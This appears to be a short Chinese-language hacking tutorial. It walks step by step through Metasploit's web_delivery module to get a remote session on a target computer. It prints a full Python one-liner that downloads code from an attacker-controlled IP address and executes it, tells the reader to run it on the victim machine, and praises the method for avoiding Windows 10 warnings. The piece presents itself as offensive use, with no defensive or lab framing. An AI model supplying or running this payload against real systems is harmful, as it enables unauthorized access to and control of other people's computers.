1.打开神器metasploit,终端输入msfconsole(我建议直接图形界面单击打开,方便啊)
2.搜索web_delivery模块:
search web_delivery
3.使用命令:
use exploit/multi/script/web_delivery
4.设置攻击机Ip:
set lhost (这里是你自己的ip)
5.运行,exploit,生成:
payload: python -c "import sys; u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://192.168.0.102:8080/UrY3oE');exec(r.read());"
6.复制payload到目标机上面运行
7.返回kai liunx攻击机,已经反弹回了一个session
8.输入命令sessions 1进入,成功获取了目标机
结尾:基本上所有操作到了这里就结束了,之后你就可以拿到shell进入系统,能做的事情非常的多,比如给目标机器关机,上传文件,新建文件,查看文件,这些都可以,这里由于文字限制就先不写了,下一篇再写。。。总能之确认好ip,网关不同可能也会导致失败,这个优点在于不会出发win10自身警告,可以说是十分炫酷了。